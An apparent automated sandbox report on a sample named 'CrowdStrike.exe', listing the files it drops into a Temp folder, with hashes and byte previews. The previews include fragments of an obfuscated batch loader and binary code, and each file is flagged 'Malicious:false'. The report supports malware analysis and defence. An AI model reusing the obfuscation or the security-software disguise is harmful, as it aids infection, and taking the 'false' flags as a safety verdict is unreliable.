                                                                      Preview:onnectionW....WNetCancelConnection2W..$.WNetGetConnectionW..MPR.dll.k.InternetCloseHandle...InternetOpenW...InternetSetOptionW..t.InternetCrackUrlW.Z.HttpQueryInfoW....InternetQueryOptionW..r.InternetConnectW..X.HttpOpenRequestW..^.HttpSendRequestW..5.FtpOpenFileW..2.FtpGetFileSize....InternetOpenUrlW....InternetReadFile....InternetQueryDataAvailable..WININET.dll...GetProcessMemoryInfo..PSAPI.DLL...IcmpCreateFile....IcmpSendEcho....IcmpCloseHandle.IPHLPAPI.DLL..!.LoadUserProfileW....CreateEnvironmentBlock..,.UnloadUserProfile...DestroyEnvironmentBlock.USERENV.dll.?.IsThemeActive.UxTheme.dll...InterlockedIncrement....InterlockedDecrement....DeleteCriticalSection...InitializeCriticalSectionAndSpinCount...RaiseException....GetLastError....DecodePointer.E.lstrcmpiW...GetCurrentDirectoryW....IsDebuggerPresent.M.SetCurrentDirectoryW....GetFullPathNameW..R.CloseHandle...GetCurrentThread....GetCurrentProcess...DuplicateHandle...CreateThread....WaitForSingleObject...HeapAlloc.J.GetProcessHeap..

                                                                      C:\Users\user\AppData\Local\Temp\Carroll

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:ASCII text, with very long lines (487), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):11022
                                                                      Entropy (8bit):5.064954901119974
                                                                      Encrypted:false
                                                                      SSDEEP:192:IVoa0yXniz7UxtaUxtQNzdiMwvN6RjprpSdYfDmggGX/xAqqL4vFBPVXKECjtp:IofEYUx1xcXFNproK7mgvTqL4vFB9Xfk
                                                                      MD5:9FAB9F640DB1F75FB8C18BFB50976ABD
                                                                      SHA1:FC30BC2230E48EE0FAEC0B1C00D635DDAC4D37B2
                                                                      SHA-256:1FA1F7F0089F89E07406412C257AE546BB9728F7055F804E800E6C41A682C882
                                                                      SHA-512:313260AE98EDBE39F21BBCBF86182E513BC658B4C48AB11AF507E5C6FA5FAE3FD9CFE6999D4ED72AF78BE5FF8FCFCA7820DD6D8A146E153588F6015F04F25CE3
                                                                      Malicious:false
                                                                      Preview:Set Walker=z..VhQTPunch Representations Silver Prayers Sim Leslie Browser Laptops Surrounding ..eJuODoom Sans En Halo England Buys Chargers Yemen ..eEmCt Wine Gonna Warned Hay Sold ..lzuArch Pocket Kenny Helmet Gov Plain Childhood Belarus ..oLWarner Hired ..Set Mirrors=W..NiHAdults Legacy Drives ..CrgfPressing Therapeutic ..baGReflect Northeast Yesterday Territories Know Equipment ..mScSporting Worcester Bend Illustrated Cutting ..GwoLogical Star ..TOeSources Itunes Logged Aurora Urban ..QiRequires Rehab ..rOwuHuge Excluded Annie Developmental Plane ..QdHoney Corporations Revenge Guarantees Accomplished ..hYIxJoel Through Samuel Distribute Effort Available Reject Tc Explore ..Set Bl=B..LrbAdverse Cutting Claims Even Protected ..nOFxRenewable Alcohol Inserted Bookings Bull Pass Damage ..BCVoid Newscom Highest Unlikely Xi Franklin Z ..wdChRefrigerator Lambda Aviation ..McPenguin Tile Estimated Yale Strip Surprising Xi Entity Sticker ..wVVDistant Mild Thirty ..NyOUHttp Confirmed Runs Crow

                                                                      C:\Users\user\AppData\Local\Temp\Carroll.cmd

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                      File Type:ASCII text, with very long lines (487), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):11022
                                                                      Entropy (8bit):5.064954901119974
                                                                      Encrypted:false
                                                                      SSDEEP:192:IVoa0yXniz7UxtaUxtQNzdiMwvN6RjprpSdYfDmggGX/xAqqL4vFBPVXKECjtp:IofEYUx1xcXFNproK7mgvTqL4vFB9Xfk
                                                                      MD5:9FAB9F640DB1F75FB8C18BFB50976ABD
                                                                      SHA1:FC30BC2230E48EE0FAEC0B1C00D635DDAC4D37B2
                                                                      SHA-256:1FA1F7F0089F89E07406412C257AE546BB9728F7055F804E800E6C41A682C882
                                                                      SHA-512:313260AE98EDBE39F21BBCBF86182E513BC658B4C48AB11AF507E5C6FA5FAE3FD9CFE6999D4ED72AF78BE5FF8FCFCA7820DD6D8A146E153588F6015F04F25CE3
                                                                      Malicious:false
                                                                      Preview:Set Walker=z..VhQTPunch Representations Silver Prayers Sim Leslie Browser Laptops Surrounding ..eJuODoom Sans En Halo England Buys Chargers Yemen ..eEmCt Wine Gonna Warned Hay Sold ..lzuArch Pocket Kenny Helmet Gov Plain Childhood Belarus ..oLWarner Hired ..Set Mirrors=W..NiHAdults Legacy Drives ..CrgfPressing Therapeutic ..baGReflect Northeast Yesterday Territories Know Equipment ..mScSporting Worcester Bend Illustrated Cutting ..GwoLogical Star ..TOeSources Itunes Logged Aurora Urban ..QiRequires Rehab ..rOwuHuge Excluded Annie Developmental Plane ..QdHoney Corporations Revenge Guarantees Accomplished ..hYIxJoel Through Samuel Distribute Effort Available Reject Tc Explore ..Set Bl=B..LrbAdverse Cutting Claims Even Protected ..nOFxRenewable Alcohol Inserted Bookings Bull Pass Damage ..BCVoid Newscom Highest Unlikely Xi Franklin Z ..wdChRefrigerator Lambda Aviation ..McPenguin Tile Estimated Yale Strip Surprising Xi Entity Sticker ..wVVDistant Mild Thirty ..NyOUHttp Confirmed Runs Crow

                                                                      C:\Users\user\AppData\Local\Temp\Consequences

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):17408
                                                                      Entropy (8bit):6.656096109477255
                                                                      Encrypted:false
                                                                      SSDEEP:384:epx324JcpLYvgveO/qhyTcPBcV+5D5eXc7/ZKhAQ:epx5cpiU7GEXc7/ZKhr
                                                                      MD5:19E98CBB75F1B8BD8EFDE5FE0ABD34B2
                                                                      SHA1:DA7A1A41FEDEDB49D33FCCEF4E55C931EDD89A88
                                                                      SHA-256:DF0CB092CD377DF6571BB86BB48E586E1A5012EDBE1C8A180DE8BE3FAE080356
                                                                      SHA-512:F412D89E162CE658780748BEB8BD6D7021D0F9690BAC2722C29794BFE74C227C3F25D1A6DB3E778C0D03BE24427C3FCD375B73082678109EC462243B4CA422FA
                                                                      Malicious:false
                                                                      Preview:....E..~..~..F..E..N$...I.......t..v$.vT..E.P..D.I.P....I..M......F.@t..E.+E.+E.+.......M..F...}.t..E.+.+E.+....j.W.u.SQ.vT....I..E.P.vT..4.I..M.......E.+E....+E..E.Pj.j..vT....I....^......z".F....[J.j.....Ph.....vT....I..FX_3.^@[..].U.......V..h.....vT....I...tah..........QP..l.I..F..t.f.......u.j.....I..4...^......z.h.....vT....I.......P.N4.1J..j..vT....I.^..].U....VW3...}........Sj..vT....I..E...ti.M.QP....I..}..M.;.~......}..M..].U.;.~.....].U.+.+.}.j.RQ+....Wj.X+..+..E.j.[.......Q.u.....I.j..vT....I..E...t_.M.QP....I..]..M.;.~.....]..M..U..E.;.~..U..E.U.+.+.j.RQ.A..+..kE..Wj.[.....+.P.u.....I.h.....vT....I....tN.E.PS....I..M..E.;.~..E..M..U.M.;.~.....U.M.j.X+.+.j....E.Q...PWj.S....I.h.....vT....I.[..t.j..O.Q.M....Qj.j.P....I.j.j..vT..X.I._^..]...U..}.....V..u.h..I..N4.`H..j..vT....I.^]...U..=..L..u.3.]...].....U..Q.E.....L....ti...tQ-....t5Ht.HHu..u........a.E....Ht.Ht.3..T...I....H...B....?.zT.u..E..BT...H....-.E..@......@.r......M......P.....

                                                                      C:\Users\user\AppData\Local\Temp\Deeper

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):21504
                                                                      Entropy (8bit):6.7544955314562225
                                                                      Encrypted:false
                                                                      SSDEEP:384:4orFzz4ep4r3ecejLC3x1tMfPM8U6awhLVrg/drYEAmgPph1nE:4oxQeU3ecejLixwghYEYP3O
                                                                      MD5:1E7FD6E5143B761B91DCF7B0321EFC3C
                                                                      SHA1:4F18054452E2A1F2E1041CA162E1342A1BAB9B01
                                                                      SHA-256:D2E56ECCBE919716F7E2A961290E740DA9719893F57E2E70D0E59971B5910889
                                                                      SHA-512:26EB77C4532CF53CA3F5F1A74683D8010AC73BA9657DC03BD82F4F379EC228E0FEC56263E8522B7AD1879A8AC7610CBD091A2DBFA5D3A124DCB05C6309A6177F
                                                                      Malicious:false
                                                                      Preview:.E..u...........E.PI.......E...........E...........E......E..I....................$..9C..E.PI...E.PI...E.PI...E.PI...E..PI..u....E..PI..i....E..PI..]....E..PI..E..u....M......E..]....]....E..PI....E..PI....E..PI..E..u....E..]....]....E..E.....P.]...Y..u...S....!....E...^..]..8C..8C..8C..9C..9C..9C..8C.!9C.w8C.k8C.-9C.P9C.Y9C.b9C.U..QQSV.....V.5..L.....E...YY.M.........#.QQ..$f;.uT...YY..~-...~....u#.E.SQQ..$j........qVS.C....E.YY.c.E...x[J.S......\$...$j.j..?.D...U..E..........Dz.V..S........E.YY.... u.S......\$...$j.j.......^[..].U..QQSV.....V.5..L.....E...YY.M.........#.QQ..$f;.uT...YY..~-...~....u#.E.SQQ..$j.........qVS.l....E.YY.c.E...x[J.S......\$...$j.j..?..C...U..E..........Dz.V..S...'....E.YY.... u.S......\$...$j.j.......^[..].j.h..K..O..3..}.j..b..Y!}.j.^.u.;5DrL.}S.@rL......tD.@..t.P.....Y...t.G.}...|).@rL...... P..H.I..@rL..4.....Y.@rL..$..F..E.............WO...}.j..|c..Y...L....L....L..x.L..U..M...u...Q.........S..j.X]...L...3.].U..M

                                                                      C:\Users\user\AppData\Local\Temp\Democracy

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):17408
                                                                      Entropy (8bit):4.379499760982806
                                                                      Encrypted:false
                                                                      SSDEEP:384:uQXoSpu88888888888888888888888888888zv888888U:Zxi
                                                                      MD5:DEE42E543988CD988E8AEB4B03F488EB
                                                                      SHA1:6FDBDB074AFD4BE01A444344B7BD00ABDDD074AA
                                                                      SHA-256:8F444581168196C045FABDE65F1C0667154AFE2FE6302E7FF342AEFD3B6B829D
                                                                      SHA-512:563007A505269BF7645F9A4D6D3DB4AF1B00D30E0C1005E43604C8FBDD734BD31FE2A4D658D23EBC683CA1AC8D795ABE3A0BA2E8A5BD3458505B04B58DC362D3
                                                                      Malicious:false
                                                                      Preview:~.~.~.~.~.}.~.~...............r.r.r.r.......................................................}.}.}.}.}.}.}.}.}...................r.r.r.........................................................................................................................................................................................................................................r.r.r.r.r.r.r.r.........................................................................................................................r.r.r...............................r.r.r.......................................................................................................r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.................r.r.r.r.r.r.r.r.m.m.m...m.m.m.m.m.m.m.m.m.m.m.m.m...m.m.m.m.m.m.m.........m.............m.....r.m.m.r.r.r.r.r.r.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.z.z.z.z.z...j.j.j.j.j.

                                                                      C:\Users\user\AppData\Local\Temp\Develops

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):22528
                                                                      Entropy (8bit):6.432021585344872
                                                                      Encrypted:false
                                                                      SSDEEP:384:x4w4aR2NQ+p5aH6tTWJI+K4/WkWyKBkPJnvRZCJK5HBxfExrIcqdw3y:xOQ+pAagJInAWiJnvqK5DfExMc2Yy
                                                                      MD5:6DB6B2AE5BAAE977FAE168E4A08641B4
                                                                      SHA1:D3110BFD3DCA6929A80A09BEC4E8BB07C2603806
                                                                      SHA-256:88C137E5726172061F509246ADA7D2D3CB8E5DABCF35CADF1D49C49B073A80A4
                                                                      SHA-512:8D766C2EC9DB083E8F8A182CF930069CECBD087526552FD626B7ACD7445F5024D192E6144641F5FE9AEA206FDFA1AD8D8390853C97B439176EA905BFB2B61B58
                                                                      Malicious:false
                                                                      Preview:i.....[..2._^]...U...0SVW..3.V.]...|.I..}..^..^..G..H...........$..vE.j.X..f.........t......3.f.F......j.X..f...,........j.X..f...v....^.....j.X..f.......F..V.....j.X..f..........j.X..f........G..0..x.I....... ..Wf...H..........u.......C...SV..X.I..6......u...S.M......P........E.P..\.I......j)........t.j.Xf...F..........j*...p...........3.@f......... ..Wf...)....F.....j$Xj(f...^.....Y..ta....u...S........Mj$Xj(f...^....Y..t:....u...S........&j$Xj(f...^......Y..t....S...P...P.....^..Cj$Xj(f...^..T....E.Y..t..E.3.P..C.-....M.P.........F....t..M....._..^[..]....I..tE..uE..uE.CuE.`uE..uE.1uE.suE..tE..uE..uE..vE.UvE..vE..vE.U....V.u...M..x...P...=....E.P..\.I...^..]...V..V..|.I..f....f..^.V..V..\.I..f...f..^.U..V..V..\.I..u.V..X.I.^]...U.......V.u...L$......P........D$.P..\.I.^..]...U...0SV.u.W.~....Q..............E.PSj...0.I.....2...3....~*.E...AQ.M...|...............M..D...M.;.|.E......f.H..E..@......u...,.I..........E.P..|.I..E..}.P.u..}..}.}..E.......(.I...x|

                                                                      C:\Users\user\AppData\Local\Temp\Ferry

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):56320
                                                                      Entropy (8bit):5.55892208875502
                                                                      Encrypted:false
                                                                      SSDEEP:768:QOU+aI4kSmEusWjcd+DvFQC7VkrHpIu9xhSaAwuNbCc/mu:/+usWjcdGQuklIusaAwu9h5
                                                                      MD5:05607FDAAA89639249B09951F5624870
                                                                      SHA1:F09748593248E10B4F70E83BF1E81DF5BF07FE2E
                                                                      SHA-256:11BDE3AF35BD166FEA20604167525CC28A2EB2FD0BC66B054C190AF00447F50C
                                                                      SHA-512:E94927608D2E4DC8024033BE66913D63367AD82625252E13FD453BB7500721EA8AB712D9CEFE91ED8F99243D65DB51825C66F73E5E061E8D67CD33B0E6608175
                                                                      Malicious:false
                                                                      Preview:d.N{.?...c.1.=.f..k..?iO...).=...m...?.....R.=.l[..].?..$.i.=.w/.d..?....C..=..(.O..?u..1...=.../.D.?.. ..&.=... ...?i.C1.].<.Ei....?X.=.g..<.P.~.0.?Y.;....=.. ]...?....m..<.......?.A.8.y.<..7.l .?S.6....=..=..q.?+`.....=.......?...%!5.=..o.h..?..y....=.i.Q.i.?v.7....=.....?dDR.;.=.nl....?b.*t#..=.x.A@h.?.......=.ZmI...?..oP.@.=...Y...?......=.....n.?u..?..=.%.k...?ZEM-'^.=..DT.!.?:Z..n=.=...0.|.?..O....=....*..?m}I..{.=...eP5.?+.}ZI..=..Q....?.^o.c;.<..'....?.u./r..<.....S.?.i...1.=...q...?/......=.{.ss..?VV&....=..#.k~.?[......<.......?vB.....<.6..#M.?...!..<.......?q_.w.#.<.....".?...R..<.......?k.=..C.=...B...?..._...<.u...r.?.y.....=.Dw.b..?.(,x.n.<.<".Q/.?...q.q)=..o\l.?.)...T&=..7a..?....L..<..?|6..?.......?#.DZ9..?.......?../....?>6)}...?, .,...?......?M......?..x%q..?.. ....?/x.bJ..?.b....?.u....?(Z.....?..t....?{}.2F..?.......?_.2...?>.T.^..?.u.....?.......?4t..d..?...Z...?(......?WI..Y..?...d...?.{.....?|...:..?..S9...?...s...?.......?....K..??......?l......?.Z

                                                                      C:\Users\user\AppData\Local\Temp\Fu

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):18432
                                                                      Entropy (8bit):6.467727872360408
                                                                      Encrypted:false
                                                                      SSDEEP:384:LWtiHUZiSkd28M1AD+FrhnTUR5ApVdbhY9TngaVS/o7vz6U1j1wW+dGY9:LWtrJADK1c+d9Y9TnzA/o7uGwr99
                                                                      MD5:667C656C256FB6F9DAC378A215CA7DED
                                                                      SHA1:8F7976EC383BA08253194E738C966C90620DA6F4
                                                                      SHA-256:379D9E9E4E9DF9C19A992C94FBF6DED32D00AF9DF1B9C758F1EF1E7ECC9354E4
                                                                      SHA-512:AE92C01AC5E897193137BEC654460633E001B2CA661033B62E613982B96A32C1251403EEFC88AE8F04DE92AF99C8663BE882A75D1AC99A419A052107D6FF7B65
                                                                      Malicious:false
                                                                      Preview:......|.....f........|.K......f.............3........3.Aj..f........P.K......f.3...............................K......3..............................0.K.....3......... ...............,....<.K......3...D.....H....@........[..f...V.......f..|.K...p......K...t...3..h.........l...j.Z..x......K....................j.Yj..f..........K......f.3......................f.........K.....f.3...............................K.....3......................f........ .K.....f.3...4.....8.....0....Z..f...F.......f...X.....`....\.......3....K.j......l.... .K......3.........................f..........K.....f.3.......................[j............K.....3.......................f..........K....f.3.......................f..........K....f... .....(.....$...Y.3...<.......K.j.Yj...3...L.....P.....H.....d....0.K..Yj...3...t.....x.....p....}..T.K..Y..3..]..}..E........f..}.....f.3..].}..E.....3.f.E...M.f..].]...5...}.j;._...._.._..]..G....._V....9..3.f9.t.V...9..f98t.F..3.}.........VQS.M...7..V...

                                                                      C:\Users\user\AppData\Local\Temp\Gov

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):5120
                                                                      Entropy (8bit):5.833657029238311
                                                                      Encrypted:false
                                                                      SSDEEP:96:XvmFmLAcevOTCigna+JAKJjc4IWE6GD++9rW8IiJJ0r2H6g+dUMLEl4fmc:fmFmLAceGei0jc4IWSnF1JdHJMol4ec
                                                                      MD5:2F2019F3BD64739D103D817B127D0A99
                                                                      SHA1:E4CC97BFB8BF7B3402C84BF5B29C3361AE96B108
                                                                      SHA-256:3B5CDBE38B52A00825DA484F31421942A3EE67F7576ABAB754B2B56B4AE62430
                                                                      SHA-512:21F918B8FBE39F8D2573D49B5B8D71C5B744DA3C658679EF2C7302070DD4E99183674CB72330091705DCE2837BC3AC2E6C3D03EB5B11BEC4A5FBE12AD7E83EF1
                                                                      Malicious:false
                                                                      Preview:(.f......X...Y...\.f..|$..D$....~.f.W.f./...I.sO..~..I...~-.I...~...X.f.s.,f...f.~..@..~,.h.J...~...\...Y...X..I...^.f............~...~...I...^.f.....~..X.J...~$.`.J.f.(.f.Y.f.(.f.Y.f.(-..I.f.Y.f.X-..I.f.Y.f.X-..I.f.Y.f.X-..I...Y.f.(.f......X...Y...\...\...\.f.V.f..D$..D$..f./..I.u..D$..f./. .I.s...(.I...(.I......$..$....D$....(.I...(.I..D$....~...~...I.f.T.f...z..D$......(.I......I..........T$......T$..T$...$.........D$......U.........$..~.$.......f..D$.f..%..I.f.....I.f.W.f.....I.....f.s.,f.~....... ..f.............#.-....=............Y........\...Q.f.T.........f...U@.I.f.V.f.($.@.I.......X...\...Y...Y...Y.......X...^.f.....I.f..-..I...\.f.s.?....f.s.?..Y.f.p.Df..5..I...Y...Y....f.W...Y.f.\%@.I...Y...X...Y...\.f.p....X...\...\.f..D$..D$.....-......A..-...f.s.&f.s.&f...f.U...\.......Y...X.f.V...\...Y.......\...Q.%.............f.T.f.s..f....f.V.f.n.f.p............Y<.@.I...Y...Y...Y...\.f.T.P.I...X...\...X.f..-..I...\...X.f.....I...^.f.....I.f.X..@.I.......Y...Y...Y.....Y...

                                                                      C:\Users\user\AppData\Local\Temp\Guest

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):35840
                                                                      Entropy (8bit):5.212882329230249
                                                                      Encrypted:false
                                                                      SSDEEP:768:YGHv7mlHW7nIhp/lNVi6dFiwc/RGNul1Eovu86eV3QKYwlrRX9G:BPt8gNpkU5uG3xYw8
                                                                      MD5:E295EFC64F30FDEDA3F9A2C87FBBB2B6
                                                                      SHA1:2D18E230EEE1012B4D16CBCF0CE9FC872745908E
                                                                      SHA-256:6D1C8EAC247DE123D533E26EBA1BFDDC1158ACD0AA15E215BC33632BD0A8F2CD
                                                                      SHA-512:BE018C29DD8C09961A9FAD909BE2DC5183F789A25E5466DB1ABE88A46493DEC2C12D03B9A5277A331C6F29144BD9668C88756310CB1D609C6DA5EDB3FCCF180A
                                                                      Malicious:false
                                                                      Preview:...4...L.........j .D.....Y..tJ...W......L..4...L..u...~.......E..F..E..F..E..F....L.j@@Y..._....L.^]...3..U..SVW.u..8.......L..>..t.9_.t........L.|.3....U....T.....t.._^[]...U..E.VW3..P..8........~....>k.!..F;.|._^]...Wj@...L.3.Y...!...L..._.V.q.;r.u.......t.f..f;.u.......Nu..^.2.^.V..F...u..v......6....YY^.3....t....t....t..j..c...j..\...U..SV.u...W.}.VW.Z.....u.VW.........t._^[]...VW.E.....u.VW...A.....u.VW.......u.3.@..3.8......U..3.9M.v..U....A..t.;M.r.2.].......U....S.].3.V.u...M.E..E.W....t.8...........;.r..}.3.A;.v..<...........;.r.E..u..E...y.....K..]..E..E..E._^[.]..E....[J........E..]..E........@..]..E....[J....@..]..}.......Au.........A..[.............Au"......At.3...]...G.E...@.Z...j.X........U..M....rCSVWj.X....It-.}..<:.\:......................u.;.r..u...u.3._^[]...3.....u...j......j............U..QSV.u.3..M...W..t..}...8@..t>...w.;.r..tV....._^[..]....J>...v".J ...v$......v&_^3.[..]....9.u.................~.........t.........U..}...E.r......t....t"

                                                                      C:\Users\user\AppData\Local\Temp\Halo

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:OpenPGP Secret Key
                                                                      Category:dropped
                                                                      Size (bytes):53248
                                                                      Entropy (8bit):4.890982629038364
                                                                      Encrypted:false
                                                                      SSDEEP:384:QU84444QnoooooooooooooooooooooooYooootooooooooooooooYooooooooooH:5S+AGWBA60iPTcf4qSq25N8EH/i6mxA
                                                                      MD5:E859420711C0FAFFEDF33DA17A2EB4B1
                                                                      SHA1:B95E9D9A48D0AB427759A724D399DDE97C11E463
                                                                      SHA-256:5010762DC34EB3679AFE29CDA9C2040309D8A784BEA758F64ED4977773C20465
                                                                      SHA-512:E605A4F8986A1CA90E1C8D58A097D867B9866D159F05D2A9E150C8301FBEE6C672E2C4958D8B79AE251DE8B596D9ED5EAACD9CEF4071251FF7D4374F0EAED8F1
                                                                      Malicious:false
                                                                      Preview:................r.r.....r.r.......r.r.r.r.r.r.r.r.r...r.r.r.r.r...............r.r...............r.r.r...........r.r.r.r.r.r.r.r.r.r.r.................................................................................................................................................r.r.r.r.r.r.r.r.....................r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.............................................................................................................r.r.....................................r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r...........................................................................................................................................r.r.r.r.r.r.r.r.r.r.r.....................r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r...................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\Handle

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):11264
                                                                      Entropy (8bit):4.209323491661389
                                                                      Encrypted:false
                                                                      SSDEEP:96:miiKX1Od5T1A/nYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYtz:vOTy5
                                                                      MD5:4DD2539DAA375331505B81E8BAD6F6F3
                                                                      SHA1:D4A96C82BE8D208E4F52150D9914C6CE892EEBA1
                                                                      SHA-256:2FA5DFE0785E6E2EE3CF30277E09BDB46D2B7FC096D40D6AAF78EC27F5B6B68B
                                                                      SHA-512:1DDE574858DF1059BA7F7708B866EF2C15D65956C85D8F4E449BECEF37ACB1D6D1597B3E26F44F2447F6F4D5D93AF47A7E22312E0B4A5C1F5CE2E593CCD59BFA
                                                                      Malicious:false
                                                                      Preview:&.&.&.&.&.&.&.&.&.&.&.%.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.%.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.%.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.r.r.r.r.r.r.r.r.r.r.r.r.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.r.r.r.r.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.r.r.r.r.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(...................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\Honda

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):6144
                                                                      Entropy (8bit):6.573279460932987
                                                                      Encrypted:false
                                                                      SSDEEP:96:ah9np2h41CzOKFM0FPd386YpQorIR8VXX7wUEwdJEIZr8qsaC+Xljytv:ahlE41OOT0F1s6YyeXpLwBEJEYb9Jje
                                                                      MD5:A964F4C9C7CA51DAC3A481EB260810C3
                                                                      SHA1:00421532D7C22082FC8314ADD4D31C153D27442D
                                                                      SHA-256:547AE8F99A07865535955A2B3913C9F8D5B06EB08AFE36816F60841E19024CD0
                                                                      SHA-512:B866FB7481C5D7C17593ADFDC502EDA1D80BAD017AFE51FAF491703561EF687C573E54D38A5D740A49EB7F78F1CEF1E3171D83DF36CF4EE22C1A75C531E1072F
                                                                      Malicious:false
                                                                      Preview:_..............u..\$".D$..D$..X....\$...U...0.=.L..VW..)......L..... ....5..L.3.j.Z.........Q......=..L.Y3.E....L...M...~........B.=..L..v.;.}..=..L...3..M.@.M.E..w..E...M.3.j._...E..I........3...........P....Y.........P..0..3.......I..A..A..A...Ny...L..U..}..R.v.....t8f.8;.M...=...QPR.(.....x#.M.E....L.P......U.B.E...U...E...M.._....E._^..]....2...3....U..SVW.}.3...tuf.?#tRf9.t......"t...'t4..;t$......uJ.._^[]......t...u.j.^.......u43.f......t..u.F..j.h.3I.W.........t.j.....t.2....t..U..SV3.W.}......wP.E.....Y..t..u.....Y..t.F.....wf..t.f.._CF..3.f..__^[]...U..W.}.W.C...Y..t.V.p...x.f..w......u.3.f.Dw.^_]...Ny...U.....L...t..E.;...L.....~..D..]...3...U....VW...M......M..U..*...3.9w .......E.P.O..#....E..E.....P.O(.....w N.M..&..._..^..].........U..E.;...L.....~.......L.]...3.....U.....<........E..L$.S3...L.V...I.f....L.W....L.....L.....L.....L.....L....L.....L.....L.....L.....L...I.....L.....L....L...L....L....L....L....L.....L.h.I....L...

                                                                      C:\Users\user\AppData\Local\Temp\Hub

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):8734
                                                                      Entropy (8bit):7.4059445349608986
                                                                      Encrypted:false
                                                                      SSDEEP:192:XIncwVQ9xZSVZPNC3noFCe46qd8ZMPVc4VqzfkMQ3o:XJ9eVndCqT4EwMQ3o
                                                                      MD5:A697F5B323EDB5A6D12F600269FA21BD
                                                                      SHA1:80307B69FCBC0B88F4CC8A201F4C6D22F6FCA5A5
                                                                      SHA-256:A512FED0ED89A361C73452E6F8C4C4ABAE1442A38D2F2D152065E96B29F2EA65
                                                                      SHA-512:20474C47E52876170788CF99B3664EDD8D325C3C6B1B9FD58CE597DA0047B27F0E7E0A8A80F4BEA05C96992EA675201498830D1A3B085B21A6211C81C0C8775B
                                                                      Malicious:false
